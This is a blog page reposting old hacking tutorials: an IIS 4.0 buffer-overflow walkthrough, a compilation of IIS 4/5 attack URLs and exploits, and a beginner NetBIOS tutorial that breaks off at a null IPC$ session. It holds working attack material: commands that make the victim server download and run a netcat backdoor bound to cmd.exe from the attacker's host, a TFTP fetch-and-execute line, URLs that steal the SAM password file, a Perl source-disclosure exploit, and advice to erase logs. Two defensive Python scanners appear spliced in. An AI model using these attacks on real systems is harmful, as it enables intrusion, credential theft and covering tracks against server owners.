
Hacking IIS tutorial

Sunday, December 2, 2007

Foreword:
This text goes out to all the NT hackers out there. It is based on the information I have from the eEye Digital Security Team, which found the exploit, and on my own experience.
Note: All the files used in this paper can be found at the main page.

According to the eEye Digital Security Team, the affected systems include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked-up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its arguments, which means that it binds cmd.exe to port 80. The eEye people have received reports from people not being able to use ncx.exe, so they have made another hacked-up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason ncx.exe sometimes doesn't work is that inetinfo.exe has to be exited before it can work. Ncx.exe fits the description of a Trojan horse! To kick inetinfo.exe, use avoid.exe (which will also soon be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.
How to do it:
First of all you'll need a server running IIS4 on NT4 with SP3/4/5 + Option Pack 4. To find one, go to www.netcraft.com or your favorite "what's-this-site-running" search engine and find a victim running the affected system. Second, you need to craft a buffer overrun of about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.

Output:

--------(IIS 4.0 remote buffer overflow exploit)----------
(c) dark spyrit -- barns@eeye.com. http://www.eEye.com

[usage: iishack ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
----------------------------------------------------------


Then issue the command as shown in the example beneath:

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

Note: give IIS enough time to download ncx.exe. Hint: use Rasmon.exe to monitor your outgoing bytes.

After that, type telnet www.victim.com 80 in cmd.exe or in the Start/Run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do whatever you want to do, but remember to:

- add a scheduled task to restart inetinfo.exe in X minutes (the AT command will do it)
- add a scheduled task to delete ncx.exe in X-1 minutes.
- clean the log files (if there are any).


Corrections, suggestions or comments are accepted here


---------------------------------------------------------------
Hi folks,
I have just compiled the well-known IIS tricks. I hope it
will be helpful for securing your server.
Any comment, suggestion or insult...? Welcome.
MAB-



SECURING IIS by BREAKING
=====================================================
by Mount Ararat Blossom


9/15/2000


mount_ararat_blossom@hotmail.com
=====================================================
01- Abstract
I am not sure what you want to get out of this, but basically this paper
is intended merely on breaking IIS web servers, especially versions 4.0 and
5.0, via TCP/IP over port 80. These techniques work even against
so-called secure networks, just because every network, even the secured ones,
lets HTTP connections in.


=====================================================


02- Intro
Alright, so you all want to know how to break into IIS web servers? First off,
you should find a CGI scanner so that things get easier. My personal
preferences are
"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).
"cis" by "mnemonix" (www.cerberus-infosec.co.uk)


To find out which web server is running on the victim site:
telnet 80
HEAD / HTTP/1.0
and there you go with the name and the version of the web server. However,
some sites might run their web servers on 8080, 81, 8000, 8001, and so on.
For SSL web servers, which provide encryption between the web
server and the browser, we use the tool "ssleay":
s_client -connect :443
HEAD / HTTP/1.0
and here we go again.


As I am writing this, I am hoping that you will be able to use this to
secure your web servers instead of using it to break into others.
=====================================================


03- Game Starts


========IIS HACK=====
The folks at www.eeye.com have found a vulnerability in IIS 4.0 which
allows us to upload a crafted version of netcat (the hacker's Swiss army knife)
onto the victim server and bind cmd.exe to port 80.
The vulnerability was a buffer overflow in .htr, .idc and .stm files. The
problem is insufficient bounds checking of the names in the URL for
.htr, .stm and .idc files, allowing hackers to insert backdoors that
download and execute arbitrary commands on the local system as the
administrator user.
To hack the victim site we need
iishack.exe
ncx.exe (you can find these two at www.technotronic.com)
plus a web server running on our attacking box.


First off, run the web server on your attacking box and place
ncx.exe in its root directory.
Then run iishack.exe against the victim site:
c:\>iishack.exe 80 /ncx.exe
Then here we go: go and get your Swiss army knife, namely netcat,
c:\>nc 80 ==============>>>BOOM!
The command prompt from the victim site suddenly appears on your box!!!
D:\> or whatever it is, C:, E:, ...


Do you want me to explain what to do next? Hey, come on, you must be kidding
...hehe....


=========MDAC- Local Command Execution===========
You might think that this is a years-old vulnerability; however, what I see on
pen-tests is that almost 40% of IIS web servers are still vulnerable to
it.
IIS's MDAC component has a vulnerability where an attacker can submit
commands for local execution.
The core problem is with the RDS DataFactory. By default, it allows remote
commands to be sent to the IIS server. The commands will be run as the
effective user of the service, which is typically the SYSTEM user.
I won't get into details; if you want, go and check RFP's web
site. However, you can find a vulnerable site by checking
c:\>nc -nw -w 2 80
GET /msadc/msadcs.dll HTTP
and if you get the following
application/x_varg
it is most probably vulnerable, if not patched.
You can find the exploit, mdac.pl and msadc2.pl, on rain forest puppy's
web site at www.wiretrip.net/rfp. It checks for the vulnerability and, if it
is vulnerable, asks for the command you want to execute:
c:\> mdac.pl -h
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
If you want to change the web site, which is located at
d:\inetpub\wwwroot\victimweb\index.htm
then you can type:
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
or whatever you want, but my personal preference is uploading our Swiss
army knife, netcat, and binding cmd.exe to port 80. To do that
I set up my TFTP server and put nc.exe in it. Then when I am asked to type
the command I want to execute, I type the following:
cmd/c cd %systemroot%&&tftp -i GET nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
There you go; go on, fire your netcat against the victim over port 80 and you
get the eggshell, cmd.exe.....


=========Codebrws.asp & Showcode.asp ==================


Codebrws.asp and Showcode.asp are viewer files that ship with Microsoft
IIS but are not installed by default. The viewer is intended to be installed by the
administrator to allow the viewing of sample files as a learning
exercise; however, the viewer does not restrict what files can be accessed.
A remote attacker can exploit this vulnerability to
view the contents of any file on the victim's server. However, there are
several issues to be aware of:


1. Codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only allows viewing of files.
3. The vulnerability does not bypass Windows NT Access Control Lists (ACLs).
4. Only files on the same disk partition can be viewed.
5. Attackers must know the location of the requested file.


Let's say you want to see the code of codebrws.asp; request the following
from your favorite web browser:
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
then you will see the source code of codebrws.asp.
To use showcode.asp, do the following, again from your infamous browser:
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._
There you go, you get the infamous sam._ file; copy it, expand it and crack
it using L0phtCrack, my personal choice, and you will get all user passwords,
even the administrator's.


=========Null.htw===============


Microsoft IIS running with Index Server contains a vulnerability
through Null.htw even if no .htw files exist on the server. The vulnerability
displays the source code of an ASP page or other requested file. The ability
to view ASP pages could provide sensitive information such as usernames and
passwords. An attacker providing IIS with a malformed URL request could
escape the virtual directory, providing access to the logical drive and root
directory. The "hit-highlighting" function in the Index Server does not
adequately restrain what types of files may be requested, allowing an
attacker to request any file on the server. Microsoft has released a patch for Windows
2000 addressing this vulnerability.



Null.htw takes 3 variables which get their input from the user.
These variables are, respectively:
CiWebhitsfile
CiRestriction
CiHiliteType
Say we want to see the source code of default.asp; type the
following in your favorite browser:
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
and you will get the source of the default.asp file.


========webhits.dll & .htw================
The hit-highlighting functionality provided by Index Server allows a web
user to have a document with their original search terms highlighted on the
page. The name of the document is passed to the .htw file with the CiWebhitsfile
argument. Webhits.dll, the ISAPI application that deals with the request,
opens the file, highlights accordingly and returns the resulting page. As the
user has control of the CiWebhitsfile argument passed to the .htw file, they
can request anything they want. And the real problem is that they can view
the source of ASP and other scripted pages.
To find out whether you are vulnerable, request the following from the site:
http://www.victim.com/nosuchfile.htw
If you get the following from the server:
format of the QUERY_STRING is invalid
it means that you are vulnerable.
The problem is due to webhits.dll (an ISAPI application) being associated with
.htw files. You can find the .htw files in the following locations of the
infamous IIS web server:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (this is normally for loopback)
An attacker can, for instance, view the contents of the sam._ file as follows:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full
This will reveal the contents of the sam._ file, which is binary; you should copy
it, expand it and crack it as I explained several times before.





===ASP Alternate Data Streams(::$DATA)==================


The $DATA vulnerability, published in mid-1998, results from an error
in the way the Internet Information Server parses file names. $DATA is an
attribute of the main data stream (which holds the "primary content") stored
within a file on NT File System (NTFS). By creating a specially constructed
URL, it is possible to use IIS to access this data stream from a browser.
Doing so will display the code of the file
containing that data stream and any data that file holds. This method can be
used to display a script-mapped file that can normally be acted upon only by
a particular Application Mapping. The contents of these files are not
ordinarily available to users. However, in order to display the file, the
file must reside on the NTFS partition and must
have ACLs set to allow at least read access; the unauthorized user must also
know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0
and 4.0 are affected by this vulnerability.
Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix
involves IIS "supporting NTFS alternate data streams by asking Windows
NT to make the file name canonical", according to Microsoft.
To view or get the source of an .asp file, type the following in your
browser:
http://www.victim.com/default.asp::$DATA
and you will get the source code.


=========ASP Dot Bug====================
The famous L0pht group discovered the ASP dot bug in 1997. The
vulnerability involved being able to reveal ASP source code to attackers. By
appending one or more dots to the end of an ASP URL under IIS 3.0, it was
possible to view the ASP source code.
The exploit worked by appending a dot to the end of an ASP URL as follows:
http://www.victim.com/sample.asp.


======ISM.DLL Buffer Truncation===============


This bug was found by the Cerberus Information Security team. It affects IIS
4.0 and 5.0 and allows attackers to view the contents of files and the source
code of scripts.
By making a specially formed request to IIS, with the name of the file and
then appending around 230 "%20" (these represent spaces) and then
appending ".htr", this tricks IIS into thinking that the client is
requesting a ".htr" file. The .htr file extension is mapped to the
ISM.DLL ISAPI application and IIS redirects all requests for .htr resources
to this DLL.
ISM.DLL is then passed the name of the file to open and execute, but before
doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and
a few spaces, and ends up opening the file we want to get the source of. The
contents are then returned.
This attack can only be launched once, though, unless the web service is
stopped and started. It will only work when ISM.DLL is first loaded into
memory.
An attacker can view the source of global.asa, for instance, as follows:
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
will reveal the source of global.asa




==========.idc & .ida Bugs=======================
This exploit is actually similar to the ASP dot bug; however, this time we get
the path of the web directory on IIS 4.0. I have even seen this bug working on
IIS 5.0 in my pen-tests. Adding an ".idc" or ".ida" extension to the end
of the URL will cause IIS installations to try to run the so-called .IDC through
the database connector .DLL. If the .idc doesn't exist, then it will return
a rather informative error about the server.
http://www.victim.com/anything.idc or anything.idq
you will get the path.


============+.htr Bug===========================
This exploit is also ever so similar to the ASP dot bug, and you can get the
source code of ASA and ASP files by appending +.htr to the URL of asp and
asa files.
http://www.victim.com/global.asa+.htr
you may get the source code to browse.


===========NT Site Server Adsamples Vulnerability ======
By requesting site.csc, which is normally located at
/adsamples/config/site.csc,
the attacker may be able to retrieve the DSN, UID and PASS of the database,
as this file may contain them.
By typing the following
http://www.victim.com/adsamples/config/site.csc
the attacker will download the file site.csc and (s)he can get some
important data.


==========Password Attack to User Accounts===========
IIS 4.0 has an interesting feature that can allow a remote attacker to
attack user accounts local to the web server as well as on other machines
across the internet. Added to this, if your web server is behind a
firewall performing NAT (network address translation), machines on the inside
could be attacked as well.
By default every install of IIS 4.0 creates a virtual directory
"/iisadmpwd". This directory contains a number of .htr files. Anonymous
users are allowed to access these files; they are not restricted to the loopback
address (127.0.0.1). The following is a list of files found in the /iisadmpwd
directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd:
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
These files are pretty much variants of the same file and allow
a user to change their password via the web. They can also be used to enumerate
valid accounts through guesswork.
If the user account does not exist, a message will be returned saying
"invalid domain".
If the account exists but the password is wrong, then the message will say
so.
If an IP address followed by a backslash precedes the account name, then the
IIS server will contact the remote machine, over the NetBIOS session port
139, and attempt to change the user's password. (x.x.x.x\ACCOUNTNAME)
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers.


=============Translate:f Bug ====================
Daniel Docekal brought this issue up on BugTraq this summer, August 15, 2000
(www.securityfocus.com/bid/1578). The actual problem is with the WebDAV
implementation in Office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for an ASP/ASA or any other scriptable page and
adds "translate: f" to the headers of the HTTP GET (headers are not part of the
URL; they are part of the HTTP request), then they come up with the complete
ASP/ASA source code on Win2K with SP1 not installed.
Translate: F is a legitimate header for WebDAV and is used in WebDAV-compatible
clients and in FP2000 to get the file for editing.
Simply adding "translate: f" and placing "/" at the end of the request to HTTP
GET will lead to the security bug.
It is a Win2K bug, but since FP2000 gets installed on IIS 4.0, it is also an IIS 4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket;             # IO::Socket also imports the Socket functions used below
my ($port, $sock, $server); #
$size = 0;                  #
#############################
#
$server = "$ARGV[0]";       # target host, first argument
$s = "$server";
$port = "80";
$cm = "$ARGV[1]";           # script whose source to request, second argument
&connect;
sub connect {
    if ($#ARGV < 1) {
        howto();
        exit;
    }
    # the request: a trailing %5C on the path plus the Translate: f header
    $ver = "GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
    my ($iaddr, $paddr, $proto);
    $iaddr = inet_aton($server) || die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
    $proto = getprotobyname('tcp') || die "Error: $!";
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
    connect(SOCK, $paddr) || die "Error: $!";   # the builtin connect, not this sub
    send(SOCK, $ver, 0) || die "Can't send packet: $!";
    open(OUT, ">$server.txt") || die "Error: $!";
    print "Dumping $cm to $server.txt \n";
    while (<SOCK>) {          # copy the whole response into the output file
        print OUT $_;
    }
    close OUT;
    $n = 0;
    $type = 2;
    close(SOCK);
    exit(1);
}
sub howto {
    print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
If we call the script Trans.pl, then we can get ASA/ASP source code
as follows:
Trans.pl www.victim.com codetoview.asp


And there you go, you get the source code of codetoview.asp.
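A log-side check for the request shapes this paper walks through (the ::$DATA stream, the trailing dot, +.htr, the ISM.DLL space padding, the .htw hit-highlighting file, msadcs.dll, /iisadmpwd, the sample viewers, site.csc and the .idc/.ida probes), as an added example that is not part of the paper and not code from any tool it names. It parses IIS W3C extended log lines, percent-decodes and lower-cases the URI before matching, and tags each request with the bug it resembles; the log lines below are constructed samples and the tag names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended log format (not from any real server).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status; "-" marks an empty field.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-09-15 10:01:02 10.0.0.5 GET /default.asp - 200
2000-09-15 10:01:07 10.0.0.9 GET /default.asp::$DATA - 200
2000-09-15 10:01:09 10.0.0.9 GET /sample.asp. - 200
2000-09-15 10:01:12 10.0.0.9 GET /global.asa+.htr - 200
2000-09-15 10:01:15 10.0.0.9 GET /global.asa%20%20%20%20%20%20global.asa.htr - 200
2000-09-15 10:01:20 10.0.0.9 GET /null.htw CiWebhitsfile=/default.asp%20&CiRestriction=none%20&CiHiliteType=full 200
2000-09-15 10:01:25 10.0.0.9 GET /iissamples/issamples/oop/qfullhit.htw ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none 200
2000-09-15 10:01:30 10.0.0.9 GET /msadc/msadcs.dll - 200
2000-09-15 10:01:33 10.0.0.9 GET /iisadmpwd/aexp2.htr - 200
2000-09-15 10:01:36 10.0.0.9 GET /msadc/samples/selector/showcode.asp source=/msadc/../../../../../winnt/repair/sam._ 200
2000-09-15 10:01:40 10.0.0.9 GET /adsamples/config/site.csc - 200
2000-09-15 10:01:44 10.0.0.9 GET /anything.idc - 500
2000-09-15 10:02:00 10.0.0.5 GET /images/logo.gif - 200
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#"):  # other directives such as #Software or #Date
            continue
        if fields is None:
            raise ValueError("request line before any #Fields directive")
        parts = raw.split()
        if len(parts) != len(fields):
            raise ValueError("field count mismatch: %r" % raw)
        yield dict(zip(fields, parts))


def normalize(value):
    """Percent-decode twice (catches %25-encoded variants) and lower-case for matching."""
    if value == "-":
        return ""
    return unquote(unquote(value)).lower()


def _htw_abuse(stem, query, status):
    """Hit-highlighting (.htw) pointed at a script, a traversal path or the SAM backup."""
    if not stem.endswith(".htw"):
        return False
    m = re.search(r"ciwebhitsfile=([^&]*)", query)
    if not m:
        return False
    target = m.group(1).strip()
    return ".." in target or target.endswith((".asp", ".asa", ".inc", "sam._"))


# (tag, predicate over decoded stem, decoded query, integer status): one rule per bug above
RULES = [
    ("ntfs-data-stream", lambda s, q, st: "::$data" in s),
    ("asp-dot-bug", lambda s, q, st: s.endswith((".asp.", ".asa."))),
    ("plus-htr", lambda s, q, st: s.endswith("+.htr")),
    ("ism-dll-truncation", lambda s, q, st: s.endswith(".htr") and " " in s),
    ("webhits-htw", _htw_abuse),
    ("rds-msadc", lambda s, q, st: s.startswith("/msadc/msadcs.dll")),
    ("iisadmpwd", lambda s, q, st: s.startswith("/iisadmpwd/")),
    ("sample-viewer", lambda s, q, st: s.endswith(("/showcode.asp", "/codebrws.asp")) and "source=" in q),
    ("site-server-csc", lambda s, q, st: s.endswith("/adsamples/config/site.csc")),
    ("idc-path-probe", lambda s, q, st: s.endswith((".idc", ".ida", ".idq")) and st != 200),
    ("global-asa-read", lambda s, q, st: "global.asa" in s),
]


def scan(text):
    """Return [(client ip, raw uri stem, [tags])] for every request that matches a rule."""
    hits = []
    for rec in parse_w3c(text):
        stem = normalize(rec["cs-uri-stem"])
        query = normalize(rec["cs-uri-query"])
        status = int(rec["sc-status"]) if rec["sc-status"].isdigit() else 0
        tags = [tag for tag, pred in RULES if pred(stem, query, status)]
        if tags:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], tags))
    return hits


def by_client(hits):
    """Count flagged requests per source address, the usual pivot when hunting a scanner."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

Decoding before matching matters: the same stream request arrives as /default.asp::$DATA or as /default.asp%3A%3A%24DATA, and a rule on the raw field misses the second.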


04- Conclusion


All the information I have given you has been widely used in the wild. However,
what I tried to do was just to collect all this information together to
check the security of our famous IIS 4.0 and 5.0. Whenever I encounter an IIS
web server during my pen-tests, I check for these vulnerabilities and
most of the time one of them works.
I hope that what I have written has helped you in some way. Thanks for reading
it; please continue to support me as I continue to release this sort of
paper. If you want to learn more, please check the mentioned people's web
sites for more details, and you can even write to me.
Peace in mind
Watch your servers in the wild

NetBIOS hacking

Decided to put this here instead of windows because it really is for beginners.






NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR


gkverma@msn.com

Preface

Dear reader, I have written this tutorial keeping in mind that readers having only basic knowledge will also be able to learn how hackers hack using NetBIOS. Using NetBIOS for hacking is probably the easiest way to hack remotely. I strongly oppose hacking, but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti-social reasons but to let the network administrators know about the security holes so that they can protect their computers from hacking. If you want to contact me, please send a mail to gaurav@sec33.com

Contents-

A brief lesson on NetBIOS

The NBTSTAT command

What you need to hack?

Types of attacks

Searching for a victim

Let's Hack - Part 1: Remotely reading/writing to a victim's computer

Cracking share passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim's computer

Let's Hack - Part 2: Denial of service attack

How to protect yourself

________________________________________________________________________________

A BRIEF LESSON ON NETBIOS

NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows operating systems (like Windows 98, Windows Me, Windows NT etc.), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computers. Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network by issuing a command to NetBIOS. NetBIOS gives the names of the computers that have been registered. In short, NetBIOS gives various information about the computers on a network. This includes:

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port. It has been assigned port number 139.

________________________________________________________________________________

THE NBTSTAT COMMAND

You can manually interact with NetBIOS with the help of the NBTSTAT command. To use this command, click on the Start button, then select Run... and type "command" without quotes to launch the MS-DOS command prompt. Alternatively you may click on the Start button, then go to Programs and then select Command Prompt. Once you are in the command prompt you can exit by typing the command EXIT. To launch the command prompt in full-screen mode press the ALT+ENTER key combination. To get back to the original window, press ALT+ENTER again. If you have launched the command prompt you will get

c:\windows>

If you do not see "windows" displayed after c:\, don't worry; just keep going, all required commands will work fine.

Now let's play with the NBTSTAT command.

If you want more help from MS-DOS about this command, type NBTSTAT/? at the prompt, i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example:

NetBIOS Remote Machine Name Table

   Name          Number   Type   Usage
==========================================
   workgroup       00      G     Domain Name
   my_computer     03      U     Messenger Service
   myusername      03      U     Messenger Service

MAC Address = 00-02-44-14-23-E6



Please note that we have used our IP address as 127.0.0.1. This IP address is called the "loopback" IP address because it always refers to the computer you are using.

This example is self-explanatory; we need not go into details. We need to know about the Name and the Number. The Name column displays the NetBIOS name, and there is a corresponding hexadecimal number. You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having IP address 203.195.136.156, we shall use the command

NOTE - 203.195.136.156 may be an active IP address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

If you want to know more about IP addresses and ports click here



________________________________________________________________________________

WHAT YOU NEED TO HACK

All you need is a Windows-based operating system like Windows 98 or Me (but I prefer Windows NT, 2000 or XP) and an internet connection.


________________________________________________________________________________



TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



________________________________________________________________________________

Searching for a victim

You may manually search for victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If at first you don't succeed, step to the next IP address until you find a suitable one. You may also use a port scanner. A port scanner is simply software that can search a block of IP addresses, say 192.168.0.1 to 192.168.0.255, for one or more ports. "Orge" is a port scanner that gives the NetBIOS names of the remote computer.



________________________________________________________________________________

Let's Hack - Part 1: Remotely reading/writing to a victim's computer

Believe it or not, NetBIOS is the easiest method to break into somebody's computer. However, there is a condition that must be satisfied before you can hack: the victim must have enabled File and Printer Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now let us take an example. Suppose you know an IP address that has File and Printer Sharing enabled, and let's suppose the IP address happens to be 203.195.136.156.

If you would like to know more about IP addresses click here. If you don't know an IP address where File and Printer Sharing is enabled, read "Searching for a victim".

The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let's suppose that the output comes out to be

NetBIOS Remote Machine Name Table

   Name           Type         Status
---------------------------------------------
   user       <00>  UNIQUE    Registered
   workgroup  <00>  GROUP     Registered
   user       <03>  UNIQUE    Registered
   user       <20>  UNIQUE    Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled File and Printer Sharing.

-------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities:

1. You do not get the number <20>. This shows that the victim has not enabled File and Printer Sharing.

2. You get "Host not found". This shows that port 139 is closed or the IP address doesn't exist.

-------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let's suppose we get the following output:

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name   Type   Used as  Comment
-----------------------------------------------------------
CDISK        Disk

The command completed successfully.



"Disk" shows that the victim is sharing a disk named CDISK. You may also get some additional information like



Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name   Type   Used as  Comment
-----------------------------------------------------------
HP-6L        Print


"Print" shows that the victim is sharing a printer named HP-6L.

If we are able to connect to the victim's hard disks, folders or printers, we will be able to read from and write to the folders or hard disks, or we may also be able to print anything on the remote printer! Now let us connect to the victim's hard disk or printer.

Till now we know that there is a computer whose IP address happens to be 203.195.136.156, on that computer File and Printer Sharing is enabled, and the victim's hard disk share is named CDISK.

Now we will connect our computer to that hard disk. After we have connected successfully, a drive will be created on our computer, and on double-clicking it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK, it means that our drive will have the same contents as CDISK.

Let's do it.

We will use the NET command to do our work.

Let's suppose we want to make a drive k: on our computer and connect it to the victim's share; we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace the letter k by any other letter.

If the command is successful we will get the confirmation:

The command completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just created a new drive k:. Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
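An audit-side version of the steps above (nbtstat -a, then net view), as an added example that is not part of this tutorial: it parses saved output of the two commands for one address and reports what an anonymous client learns from it, which is the same check an administrator runs against their own hosts. The sample outputs are constructed (192.0.2.10 is a documentation address) and the suffix table is the standard NetBIOS one.

```python
import re

# NetBIOS name suffixes as shown by nbtstat, keyed by (suffix, UNIQUE|GROUP).
# <20> is the File Server service, the entry the tutorial above keys on.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain/Workgroup Name",
    ("03", "UNIQUE"): "Messenger Service (machine or user name)",
    ("20", "UNIQUE"): "File Server Service",
    ("1b", "UNIQUE"): "Domain Master Browser",
    ("1c", "GROUP"): "Domain Controllers",
    ("1d", "UNIQUE"): "Master Browser",
}

# Constructed command outputs in the shape the tutorial shows (192.0.2.10 is a documentation address).
NBTSTAT_SAMPLE = """
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
WORKSTN1       <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
WORKSTN1       <03>  UNIQUE      Registered
JSMITH         <03>  UNIQUE      Registered
WORKSTN1       <20>  UNIQUE      Registered

MAC Address = 00-02-44-14-23-E6
"""
NET_VIEW_SAMPLE = r"""Shared resources at \\192.0.2.10

Share name   Type   Used as  Comment

---------------------------------------------------------------------
CDISK        Disk
HP-6L        Print
The command completed successfully.
"""

NAME_LINE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
SHARE_LINE = re.compile(r"^(\S+)\s+(Disk|Print|IPC|Device)\b")
MAC_LINE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nbtstat(text):
    """Return {'names': [(name, suffix, kind, status)], 'mac': str|None}, or None if host not found."""
    if "host not found" in text.lower():
        return None
    names = []
    for line in text.splitlines():
        m = NAME_LINE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            names.append((name, suffix.lower(), kind, status))
    mac = MAC_LINE.search(text)
    return {"names": names, "mac": mac.group(1) if mac else None}


def parse_net_view(text):
    """Return [(share name, type)] from the table that follows the dashed rule."""
    shares, in_table = [], False
    for line in text.splitlines():
        if line.startswith("---"):
            in_table = True
            continue
        m = SHARE_LINE.match(line) if in_table else None
        if m:
            shares.append((m.group(1), m.group(2)))
    return shares


def describe(suffix, kind):
    """Human-readable meaning of one name-table entry."""
    return SUFFIX_MEANING.get((suffix.lower(), kind), "unknown suffix <%s>" % suffix)


def assess_host(nbtstat_text, net_view_text):
    """Turn the two command outputs for one address into an exposure report."""
    nbt = parse_nbtstat(nbtstat_text)
    if nbt is None:
        return {"reachable": False, "file_sharing": False, "shares": [], "mac": None,
                "findings": ["port 139 closed or host not found: nothing to enumerate"]}
    findings = []
    file_sharing = any(s == "20" and k == "UNIQUE" for _, s, k, _ in nbt["names"])
    if file_sharing:
        findings.append("File Server Service <20> registered: File and Printer Sharing is enabled")
    for name, s, k, _ in nbt["names"]:
        if s == "03":
            findings.append("Messenger <03> entry discloses the name %r to anyone" % name)
    # without the <20> entry there is no File Server service, so skip the share table
    shares = parse_net_view(net_view_text) if file_sharing else []
    for share, kind in shares:
        findings.append("%s share %r is enumerable without credentials" % (kind, share))
    return {"reachable": True, "file_sharing": file_sharing, "shares": shares,
            "mac": nbt["mac"], "findings": findings}
```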


________________________________________________________________________________

Cracking Share passwords

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker, "PQWAK". All you have to do is enter the IP address and the share name, and it will decrypt the password within seconds. Please note that this can crack the passwords only if the remote operating system is one of:

Windows 95

Windows 98

Windows Me


________________________________________________________________________________

Using IPC$ to hack Windows NT, 2000, XP

Now you must be thinking of something that can crack share passwords on NT-based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker. It is simply a string that tells the remote operating system to give guest access, that is, access without asking for a password.

We hackers use IPC$ in this way:

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

